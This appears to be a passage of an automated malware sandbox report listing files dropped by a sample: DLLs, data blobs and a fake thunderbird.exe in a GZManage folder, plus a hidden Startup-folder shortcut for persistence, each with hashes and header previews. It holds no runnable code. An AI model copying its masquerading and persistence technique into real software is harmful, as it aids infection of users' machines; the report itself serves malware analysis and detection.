Process:	C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	458848
Entropy (8bit):	6.755005117484388
Encrypted:	false
SSDEEP:	12288:uRS9bzEY9IiJ3GLL8XoscqSgjZa1AJA+zGx:GStzEY9IiJIL84sjSkamJA+zG
MD5:	7C4A1822055BF598F35D72E0EC98F429
SHA1:	2279A6D8E207E03C4C771D8517DD36C037F81FBF
SHA-256:	34B3343A8E21AE1DD96099EB63FD06C715F221CBF5A4A34018EEC1B344A8674F
SHA-512:	0DB43EE062436B1D4172B6E8ADDA499966A5443037F9E8AA378ABCB52A86C3FA01F0F090DCAA14D0810289E39A390E9848475A2FAF04B6776CEAF7D3A8A8ACD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w...3...3...3....c..5...\`..7...\`..1...Q`..1...3...w...g\.......y..2...._..7...Rich3...........................PE..L....[?I...........!...............................`......................... ......................................p9...6...4..P...................h...........d-.. ................................................................................text............................... ..`.rdata..t...........................@..@.data....`...p...`...V..............@....rsrc...............................@..@.reloc...........0..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\noubls

Download File

Process:	C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe
File Type:	data
Category:	dropped
Size (bytes):	21484
Entropy (8bit):	5.437098621647359
Encrypted:	false
SSDEEP:	384:kZAr47zFtbfHSjzxbMJRQDWNEMC93P/noUmuU7hfSxSdebTKBoTO:uy47zFtbfH2zmJSnoFNJSxSGTKmTO
MD5:	DE2E079B3B6C1DE36B164CE9252CCD2C
SHA1:	0811083BBA474AF86A0BE738509FBD26A233F685
SHA-256:	74A3206A31AA53921C4A6234264515094829BFD12CC6FD15449F3E53129ECCE6
SHA-512:	4C93D07EB4D69CB643F261178A3BE5FFABA7EC8291EFAC73506C27491F63274FD237C0A21C39C308647822B57379B02895CF7BF4DEAA57365E78B0D370F01AF1
Malicious:	false
Preview:	.y`gvM.....y.Y..Bi..eF^......RiaWsa.k._...K......C...W.gD.f..Z.i.....l....sVB..P`.A.l.NTx......iK.\mS........MZ...[..._.Y.C..QZ.Rn.i..n.Z`._.GABhZ^....xMe^y..XCL_........Jx.BZ.bbCu..XJtK..qt.[_.VVbZ.jsh.R.I...._B`..Xw..._N....Nekr.erX....LG..jT.l.j.W.Nk.gE.Hh.mf.`....]B..\.`tf.E`fnn....Eiue.V.[Y\.._r.c...h.uO.MC^q........K.uP..Piq.aR.n..wqKbAkmREvVIq...oUBtU.....Ll..HE.Py.m.Xi..X..Vs^.X..rl...AQQQ..F....Av.Nhe..k..a.XK.m........p...s.j..qT...YatVR.suKcX..._Z.Qj.b^V..kAj.[dKh.a.N...XuM].....x.dMvR.X..]..up..U..n.uaXc......gAU...kK.K.Z]VVVU.wi...UaIfxM.Xt.Z[.bSUw_g....]r.vtFV..]R.^.t......gY`.Jq\e.Jw.....v..oQH....\.P.e.....B.\P.d.Q.k.jftj......x.n.b.Ah.[.UyMt.N].].as..u...d...a_p.Pm..XoV..Bo.....y.B....eoH.i.`Q.f.K[rHQD.F.`Ug....W...w......byg.K....Go..[o.t..e..JXj...bSO.uMR..A....x..Z...bHv..P]j.].......KI.jq..yPN..YHZ.oM..l..o..Pr.j.BO.`Jy..lN..d..g..p...O.SSu.MB[.`.Q.hd.vU...c.Pi..\RH.s..L`....]..R.]a..NP...ehD..ig\Iqd.SaZn.d.u.HmgFy.c.Q...yLI...ncsR..Gap...F.....nrY..L.vr...L...l.r.

C:\Users\user\AppData\Roaming\GZManage\nsldap32v50.dll

Download File

Process:	C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	145032
Entropy (8bit):	6.223296464610944
Encrypted:	false
SSDEEP:	3072:aRQRTpMrhZ3qPKnWK62E181dYZFqNpkIkwn:aiRTpMd0Si2d6FOkIk
MD5:	7081AF61B5B48EE3709FFE2996B3362C
SHA1:	69EDA947CEE9426C59683D867954A3DDFA44CC53
SHA-256:	9F3EBED578B7B58C488CD601770C0CD5346D029DB8451425CC2CE8546897F107
SHA-512:	C4E3592048DC41482F4E8F57993EF5328461C476245F125D3470B64EF8A652466BD2C12AE53E2DC9AC94A9A1C77D08F01988AC1622C2C00A28C0DB35E86519CE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..ZS..ZS..ZS..!O..XS...O..[S..5L..^S..5L..XS..ZS..cS..8L..YS...p..`S..s..[S..RichZS..........................PE..L....[?I...........!.........p......A..............`.........................0.......A..................................i%......<.................... ....... .......................................................................................text.............................. ..`.rdata..9=.......@..................@..@.data...............................@....reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\nsldappr32v50.dll

Download File

Process:	C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30344
Entropy (8bit):	3.9528812148205814
Encrypted:	false
SSDEEP:	192:68TPhk5fVC15iPnyu2rqr3NBW37AI6i3wFVUrBvCzW0BEyncjWOeyowJL/te9Xxu:xTP8fVC783vW3bwQDinNYJLtI
MD5:	B8019E6A4DCF1037AB4FB3EA74FFF91D
SHA1:	BA12B694467BB3979BD3FAEAB8698AA631C1276B
SHA-256:	8377A1BABBDB38611C7BBBAF05AC5108C1C6539104B160CB1DBFCBB7638F3AE8
SHA-512:	F60E79E01C8435EF7AB60AB2D5A38142AD3F3F32139DD77BC6CE877B84B9721077CAA39B868774842639058218740644BB897BE02720E5D2CC7B0F8707FD4FFC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........................................................x.......Rich............PE..L....[?I...........!..... ...0......g#.......0.....`.........................`.......................................4..@....0..d....................`.......P.......0...............................................0...............................text...*........ .................. ..`.rdata.......0.......0..............@..@.data........@.......@..............@....reloc..\|....P.......P..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\nspr4.dll

Download File

Process:	C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	161384
Entropy (8bit):	6.486424042107867
Encrypted:	false
SSDEEP:	3072:nt3Y4Gn/cq5IFL+UaxFw2TRvRE1kayxLutLwn2bHcnn4:NYfnheSUaxFPpREWxLuw+
MD5:	312DC77A5D170D38F3D88873181FCC0E
SHA1:	E667573218122C9029DF41ACE48C709ACB5CC5E4
SHA-256:	9018EB816FD4931CFD46793DF9ED4DEDB0184566E7B8AEE39DDE542B4879CB00
SHA-512:	4CA9B816B47C99ADC3D018BAC67612892B4EFAC327E55198245CE202A6BD3BE0F9E11342337AE2533B9462CC1E877568BAA319DFEE9B807AB99808D7B09A15FE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.mk..mk..mk..qg..mk..qe..mk..ra..mk..ro..mk..mj.!mk..rx..mk..N[..mk.Nkm..mk.vMo..mk.Rich.mk.................PE..L....[?I...........!..............................`.........................p......)i..............................`....*......x....@..............p`.......P.......................................................................................text............................... ..`.rdata..6j.......p..................@..@.data...\|.... ....... ..............@....rsrc........@.......0..............@..@.reloc.......P... ...@..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\nss3.dll

Download File

Process:	C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	382560
Entropy (8bit):	6.396537438640733
Encrypted:	false
SSDEEP:	6144:Z9bwkDptQVYLyvKKp7AfrVz8lzispR55+/kBLtH7m2R2Kk+XknIUkJuiC3Rl6+/b:Z9bwkDptQVYLyxp7AfrVz8NispRCcbpe
MD5:	0E845C5A84427B1AF9B577C122BC4E23
SHA1:	43AFE65E3AA16C5981B30E6D896F7ED74BE545AE
SHA-256:	F9E1F2A9A88A5D5CA748A84784D56A65D5E611785AA1D3638C07E9B36624BC73
SHA-512:	8C3A9AD7E90E09A53207A287ADF0D283AEB246F4EF4586C3B19C219FDB7614D79B7B15560F1AC5A5D34E918B6595BCB932C8FC96BD1D20FE24CEDC218BF695E2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................).............................m.....U.....Rich...........PE..L....[?I...........!.....0..........;2.......@.....`................................................................p................... ...........h...........l....A...............................................@...............................text....#.......0.................. ..`.rdata.......@.......@..............@..@.data....2...@...@...@..............@....rsrc... ...........................@..@.reloc...".......0..................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\plc4.dll

Download File

Process:	C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	34416
Entropy (8bit):	4.0883403433771806
Encrypted:	false
SSDEEP:	384:MPIxljxCHKnD4PFfxAyOkdyLO6wrgPenNYJLtIT/:M0pnCxgwrgPen4LE
MD5:	9ED02E151C4F5417C10594A19EEEB034
SHA1:	139F6DAA64D1ABC84B48A00CC25049190E338AC0
SHA-256:	FA4BEBED44856339E1D65A670ECBCE8487EC95851B1CF278D40B442E5E118F71
SHA-512:	DA8EA86529BBC407C033DE56C940E6305661167021BF79F893DE232A1ED7C54A294E71FE8FC629767FE9FC0686CD2B30AFD84BF3EEE0415AAA604C8D2CCDE8D9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[...:..:..:.%...:.%..:.%..:..:..:....:.,<..:.....:.Rich.:.........PE..L....[?I...........!..... ...@......{!.......0....)`.........................p.......................................;......$:..P....P..............xp.......`..`...`0...............................................0..T............................text...>........ .................. ..`.rdata.......0.......0..............@..@.data........@.......@..............@....rsrc........P.......P..............@..@.reloc.......`.......`..............@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\plds4.dll

Download File

Process:	C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30312
Entropy (8bit):	3.4254270167584915
Encrypted:	false
SSDEEP:	192:HGaz0KM7Timc4W7uW6cbpXchb+i4BDYFr0ZYyFB+iEyncjWOeyowJL/te9Xx5gOq:HL0KMTi1bigi4BDIr0iyFBNnNYJLtIq
MD5:	5D35EE582ED616947ADE1002F25682CA
SHA1:	70B8862DA9ED370C78F82218251BD40E32C5514A
SHA-256:	ED79346AF0BD7276039E011D72B7C817E2015EDDF91224E08DAF3B2A041CA5AD
SHA-512:	E3B011BD68919E4E8BB664426249F774BF1291434242F5E258D05134CA4C13C27EBDF46C5909D1F3B68731D68F936CACF18A5F9A1397E0A7C8819E2B1A19CADD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'4.XcU..cU..cU...J..aU...J..fU...J..aU..cU..lU..7v..`U...S..bU...u..gU..RichcU..................PE..L....[?I...........!.........@......;........ ....*`.........................`......................................p".......!..P....@..............p`.......P......@ ............................................... ..@............................text............................... ..`.rdata..S.... ....... ..............@..@.data........0.......0..............@....rsrc........@.......@..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\smime3.dll

Download File

Process:	C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	112224
Entropy (8bit):	5.8935265370850285
Encrypted:	false
SSDEEP:	3072:aHg/reLDq+TdOcQCRcNW+8ilKocmFwSsZGloIYKNloFrYnW:aOyl5OMcNW+hMWup
MD5:	05FF877978A22599F8675344AFF7E9AC
SHA1:	F4E083FBD2442B0D1C9FE107DC7370E5E47BFCB7
SHA-256:	B8F3022392E3BD755B4D3BAE4011303EEA6ACAF5369AE987F33F654A30AEB5C2
SHA-512:	56105DBA4DEABBC2D1F2DE5D38182C71DD197DC32AADADFCE4E8C40E1EABB2E7280BAA60A635D42E71986E962905D24BE0FF4D14E02CC328F7053AA06BBC593B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.]#...#...#...A...!...L...&...L...!...#......w.........."......+...Rich#...........PE..L....[?I...........!......................... ....+`.................................................................U......@>..x.......0...........h...............@#............................................... ..8............................text...T........................... ..`.rdata...M... ...P... ..............@..@.data... ....p.......p..............@....rsrc...0...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\softokn3.dll

Download File

Process:	C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	254060
Entropy (8bit):	6.420458010773922
Encrypted:	false
SSDEEP:	6144:pc5eOUXOjniT9KfIx54jweoqgKwmQULxoj/idhU:pc5eOHiemOomwhqc
MD5:	DA7C7F8681BC177CC5CC1A5564BD6CE5
SHA1:	CED677CB95E289F022F62BB21D68F5FDB9EDFDD0
SHA-256:	656D3FFB58F3F75F0506595D5D818CECC59AA51DE492B21665ECAA0FF8966CE0
SHA-512:	3FDA6CA7496745A260EC82A3E4AD387AE25CFF19C950C5730F416D9EB7893032C5DC608FF25EACE223BD9F2FB95FADD7F5F7BAF32A52E30AC81BD2F37C4A4547
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...N.G.N.G.N.G.Q.G.N.G.R.G.N.GfR.G.N.G.Q.G.N.G.Q.G.N.G.N.G.N.G.m.G.N.G"H.G.N.G.n.G.N.GRich.N.G........PE..L....[?I...........!..............................-`................................z...............................`k.......b..x.......0............................................................................................................text............................... ..`.rdata..\|].......`..................@..@.data...h@...p...@...p..............@....rsrc...0...........................@..@.reloc........... ..................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\ssl3.dll

Download File

Process:	C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	136800
Entropy (8bit):	6.05442036081695
Encrypted:	false
SSDEEP:	1536:lTvOaQ4zixRrizHmNexem0HfvpFnkkwyaDoaZBE3E5dqz+HNHFm+7zn4:JOaQ4zi78GW0/vpFn/wAE5YzmPm+7zn
MD5:	FDF29B3A596524ADCC11C6031E682E16
SHA1:	E78CCD155ADF81975A3187C6B7B98AD4A90AF594
SHA-256:	F5B17B9122EA779DA6E1C303F7D2D16096970E840A5FE072A65371FCFC9A8D34
SHA-512:	B4C1EF7A7D2E17C35AAF9D2BAB402871520AC2645B6F3AF7593FCAFFC340DC5075B16E8179A69A0513C9E4D51C5DC968E86BCCC4DBE2FACCD1D3A2A0A1315B25
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[.W%..9v..9v..9v}.*v..9v..7v..9vp.3v..9vp.=v..9v..8v..9vK..v..9v..?v..9v..=v..9vRich..9v........................PE..L....[?I...........!.....p..........jt............1`....................................................................z.......x....... ...........h...............P...................................................D............................text....e.......p.................. ..`.rdata...7.......@..................@..@.data...T...........................@....rsrc... ...........................@..@.reloc..`........ ..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe

Download File

Process:	C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8504936
Entropy (8bit):	6.712907921131404
Encrypted:	false
SSDEEP:	196608:hAvt9ppoRcGBLRrgeu1kEMgHNODPzMhp0GEZhrKCwVFE1GfYJWDew3d4QeW2jscn:hAvjppoRcGBLRrgeu1kEMgHNqPzMhyGW
MD5:	A9D830B99ABEA315C465A440C4AA1B94
SHA1:	CCA605A33BA3CEFDF179CB93743A643A86518EFF
SHA-256:	815FC1B444CF92E9A7EB8BDAEAA9FF61A4FE49F88C9C691A87AD4C2A26956BC3
SHA-512:	4FE3D34DCE5D5A829F76B610EB65E60D14263901F6783BD0E2BEC76B7C6E94817CB955EB0C5AA8590AAEB3C718F9C24911C64D463E37DC14CFC4A2A4B0C63667
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........?..wQ..wQ..wQ..k]..wQ.@k_..wQ..h[..wQ..hU..wQ..hB..wQ..wQ..wQ..hB..wQ..Ta..wQ..wP.2.Q..T`.aqQ..qW..wQ.<WU..wQ.Rich.wQ.........................PE..L....X?I..................c..N......H.c.......c...@..........................0.......................................ry.<_..tEx......@..0...........p.................c...............................................c..#...........................text....c.......c................. ..`.rdata........c.......c.............@..@.data....S....y.......y.............@....rsrc...0....@.....................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\uwibrk

Download File

Process:	C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe
File Type:	data
Category:	dropped
Size (bytes):	4641689
Entropy (8bit):	7.95439482597699
Encrypted:	false
SSDEEP:	98304:m6u+UOCN1tSz2J8VrYFGGOdaq9uRaQVLPmH+uTUCOqTIom4oIo:Q+Ng1Yzm89YvOdaqElVLuHvTU5QIomJ
MD5:	7045D874EE7EF54A76503EC5C8E65F2A
SHA1:	D6F76F241E1BEAB6A34EEB26380C38BFD5BECF52
SHA-256:	08EE9C18D725B3133AA0254DCD94D220A7ECD717641C996B06748F07AF701DBF
SHA-512:	0FE934493ED2CA2712758FE460D4BC5F111D99AD45E38FD2CF53CD7794334B2A87D0F431D944907C7B3C2ECF375B2F101303D503A492A6B065C05E5A07C090E8
Malicious:	false
Preview:	.I]..w....oj.P.T.O.tt.O.._.y]I..yus..F.[Xn..b.Q.iL...a.u..I.Q..Int.k.I..q.P..P..O...JO.bq.nU.q..`Kj.rk..N[....sG..WXqL..GBh.Rw....KQ.y..S..__jT..E.FK.OD..Rhcr.RK.lSZ.hrF..Rvcg.YLrt.VssrA\i..Q.TPh..k.`..E....Hh.....^...[.....\...nw..mC....[.JNGj..e.Wj.EJNK..Q.....tc.TjCyr..Z..jt...Y.g.uy.Qc^.hQ..c]L..lAyRmA.p...bsSv.q.RM.X.X......oN......s.M..c..FRnRQyfFX.KZ.Y..SiY..m_.V.iI\.k...w..r..r.Gx...Sl..`k..QIWdO.N.dv....YK...C..`...Xb.ieY.[...wZm.`.Tc.D..KW.W.W.]....H.......Y.WJ.aU...n.q....Eu.p..].w.fLA.M....kab..Uyyj.w..JQN...w.d.......njk.f.xwUPa..l\....Mi.O.v....^o.qh.t..I....DQJo...g...T.iaJXm.K.bIoU.S.w.MW.RUXTF.T..rB....]...fhd.jc....K.....rf.Sfvj._Z.k..\u.n]fw...uy..X.R........f..S.j.....[]Eri.yN.hx...f.RySZh..p.].O...e.i.....C..fu.....FMB...Z.u\[..R.RwsS.Or.N.^..cG...B....i.ZGBJ.o.....IWxl.D.VOC.....k.[.YFE.B..bN..k.BU......f.DDf.yUw.....ZLl.......s...t.F....P.dOM.B...h.d.iAn.cb.a.oW.J.p..AN..FO..ct..`.A......p.V...........M...n.hj..bxMu..u.e...GYIb..`..mQ...J.._K.w.C.f...VTtjDKZ..._O

C:\Users\user\AppData\Roaming\GZManage\xpcom_compat.dll

Download File

Process:	C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73840
Entropy (8bit):	6.756538727570579
Encrypted:	false
SSDEEP:	1536:X9W1JxRrk7xYaPxOw922ESbw030w/aUeEr32n4Q:obrSYaF2X8RaUecmn
MD5:	E9B352B512E03ED5C35D6350414B68AD
SHA1:	64CCB609EE5BB52A8DD58E95D6D56F54A7E33A49
SHA-256:	0895B8029EAB334D2AA5D31A77A975198BD71EE8D641825FCFCD178A0C5BA3D3
SHA-512:	776AC14B782AD8B9DEA952EB1AE09D799EDB5D7EA5AD7C358BCBDCD7E6C2545BE78D55467E7101E0FABF01D6668F7CA4872D57C526E2AA3F2D436A65AD85C8D4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B...#...#...#...?...#..N?...#...<...#...<...#...<...#...#...#...<...#...#..N#.......#.......#...%...#..2....#..Rich.#..........................PE..L....[?I...........!.........n....................5`.........................@..........................................oE..0........ ..............x........0..P... ................................................... ............................text............................... ..`.rdata...Y.......Z..................@..@.data...l...........................@....rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\xpcom_core.dll

Download File

Process:	C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	414832
Entropy (8bit):	6.835309595385882
Encrypted:	false
SSDEEP:	12288:uOQdJEzxhYuUZzp63kZEaYswEJM2r0P3/6e5n:uOQdWEzpAcECrte5n
MD5:	CFAC67CE4389AF145FCB33D05E2E4243
SHA1:	F0F4F60717516250EDA61299615E939B1C8B0F02
SHA-256:	822C28935F9ACFFA0F894652ADC9BA344308990005B4439E36AEA4544B9B2B80
SHA-512:	6E3F45EEFDA139AA2140FE5172321A621E87866499020220135D4A6836685EF347B9DEE7FB05332B9ACC2C6A43D44F5980C5A77D0B2C8173D221B5DAD5668811
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n:..[..[..[..QG..([..G..,[..ED../[..ED..([..[...[..HD..&[..[..9Z..~x../[..~x..U[...]..+[...{.."[..Rich[..................PE..L....[?I...........!.....4...........>.......P....7`.................................D..............................P....M..h........@.......................P...:...T...............................................P..t............................text...;3.......4.................. ..`.rdata.......P.......8..............@..@.data...p'.......&..................@....rsrc........@......................@..@.reloc...?...P...@..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITB5CE.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Dec 5 09:40:28 2024, mtime=Thu Dec 5 09:40:28 2024, atime=Thu Nov 28 12:29:44 2024, length=8504936, window=hide
Category:	dropped
Size (bytes):	904
Entropy (8bit):	5.025473757605391
Encrypted:	false
SSDEEP:	24:8h/mgqcDSklXUCAvIe5szOnLAlGQUjDpZm:8xJqcDllteIOn8MjD/
MD5:	E82FE63483BF7ABD4C8BF0049D4660AD
SHA1:	39D19358677593DDDAFA166D5EAA456A7824312F
SHA-256:	88A37BE59F3AFDDE2DBAF48E19AB1BF80F66BF15079B0AC073DA63695AA82163
SHA-512:	272F1CDAFC7438266386C84E5592EF2B2D8A68F545521A84D2CA0BC95F31E797B00AA8AB565ADE072657F78F884EA66520FB0C8812978B22815494AEB784CB75
Malicious:	false
Preview:	L..................F.... .......G......G.......A..h........................:..DG..Yr?.D..U..k0.&...&.......$..S........G..`..&.G......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.T...........................^.A.p.p.D.a.t.a...B.V.1......Y.U..Roaming.@......EW<2.Y.U..../.........................R.o.a.m.i.n.g.....Z.1......Y.U..GZManage..B......Y.U.Y.U....f.....................#V..G.Z.M.a.n.a.g.e.....l.2.h..\|Y.k .THUNDE~1.EXE..P......Y.U.Y.U....s.........................t.h.u.n.d.e.r.b.i.r.d...e.x.e.......i...............-.......h..............d.....C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe..&.....\.....\.R.o.a.m.i.n.g.\.G.Z.M.a.n.a.g.e.\.t.h.u.n.d.e.r.b.i.r.d...e.x.e.`.......X.......571345...........hT..CrF.f4... .Kl.Y.....-...-$..hT..CrF.f4... .Kl.Y.....-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Kcvalid.lnk (copy)

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Dec 5 09:40:28 2024, mtime=Thu Dec 5 09:40:28 2024, atime=Thu Nov 28 12:29:44 2024, length=8504936, window=hide
Category:	dropped
Size (bytes):	904
Entropy (8bit):	5.025473757605391
Encrypted:	false
SSDEEP:	24:8h/mgqcDSklXUCAvIe5szOnLAlGQUjDpZm:8xJqcDllteIOn8MjD/
MD5:	E82FE63483BF7ABD4C8BF0049D4660AD
SHA1:	39D19358677593DDDAFA166D5EAA456A7824312F
SHA-256:	88A37BE59F3AFDDE2DBAF48E19AB1BF80F66BF15079B0AC073DA63695AA82163
SHA-512:	272F1CDAFC7438266386C84E5592EF2B2D8A68F545521A84D2CA0BC95F31E797B00AA8AB565ADE072657F78F884EA66520FB0C8812978B22815494AEB784CB75
Malicious:	false
Preview:	L..................F.... .......G......G.......A..h........................:..DG..Yr?.D..U..k0.&...&.......$..S........G..`..&.G......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.T...........................^.A.p.p.D.a.t.a...B.V.1......Y.U..Roaming.@......EW<2.Y.U..../.........................R.o.a.m.i.n.g.....Z.1......Y.U..GZManage..B......Y.U.Y.U....f.....................#V..G.Z.M.a.n.a.g.e.....l.2.h..\|Y.k .THUNDE~1.EXE..P......Y.U.Y.U....s.........................t.h.u.n.d.e.r.b.i.r.d...e.x.e.......i...............-.......h..............d.....C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe..&.....\.....\.R.o.a.m.i.n.g.\.G.Z.M.a.n.a.g.e.\.t.h.u.n.d.e.r.b.i.r.d...e.x.e.`.......X.......571345...........hT..CrF.f4... .Kl.Y.....-...-$..hT..CrF.f4... .Kl.Y.....-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Windows\Temp\AppsLo.exe

Download File

Process:	C:\Users\user\Desktop\MiJZ3z4t5K.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	10750445
Entropy (8bit):	7.99322302573468
Encrypted:	true
SSDEEP:	196608:sfUUhRnMReYqoWJ8O1FrYKuMdQRCbRGWj0MpQXs2eQdYwWXqEEV8MEkqISNNNt0:8LhqRevZYqaWVf2ldYB6f8/1v2
MD5:	B0AD260D058A7F4F299B4BBC7F876799
SHA1:	E056C9E7FAD86450E47C43120F9DD74E20C84DB9
SHA-256:	79120D139D1041D1C9A506A1A21ED304211F43893DD61295E64028CDB1FA34E2
SHA-512:	04887BD3D1FD26B6F1E810EADDCE12A459B61FC8BD52FCDEAD350DCB7D5D65E7F38A57AB98E88004829A6798CE364BC1D48B45965CB6488BD06ADCB6A5CC4A95
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A!.S.@...@...@......@.....y@......@..."\|..@..."{..@..."z.#@...8...@...8...@...@~.PA...#z.N@...#...@...@...@...#}..@..Rich.@..................PE..L......Z.....................t....................@..........................P............@..............................................:.......................=..Pv..T....................v......0p..@...................4........................text...7........................... ..`.rdata..`...........................@..@.data...0...........................@....wixburn8...........................@..@.rsrc....:.......<..................@..@.reloc...=.......>..................@..B................................................................................................................................................................................................................................................

C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\BootstrapperApplicationData.xml

Download File

Process:	C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (483), with CRLF line terminators
Category:	dropped
Size (bytes):	2388
Entropy (8bit):	3.7337280491206837
Encrypted:	false
SSDEEP:	48:y+03qHhhOXWkFepne1vGp0Ji0wEycuT83vgkWHaiJ+rB7i4+rDDl:X/xn6vGpj0wEycl3vgkTi+rB7H+r9
MD5:	18FB784C4B3D79FC09FB3E275B9DE67D
SHA1:	A09979D827F51E0E53B375F8C76DAD5AC5EA9A5F
